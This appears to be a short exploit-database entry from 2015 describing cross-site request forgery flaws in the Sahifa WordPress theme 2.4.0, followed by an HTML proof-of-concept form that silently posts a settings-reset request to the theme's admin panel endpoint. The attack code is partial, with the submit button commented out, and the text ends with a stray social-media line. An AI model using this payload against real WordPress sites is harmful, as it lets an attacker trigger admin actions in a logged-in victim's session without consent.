|Author: Dr.AFN[D]ENA||, Published: 19-01-2015|
The Sahifa theme for WordPress is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.
Exploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
Sahifa 2.4.0 is vulnerable; other versions may also be affected.
<h1>Wordpress sahifa theme CSRF exploit By Dr.AFN[D]ENA<br></h1>
<form method="post" action="http://local/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit" value="Reset Settings" />-->
Like us on Facebook :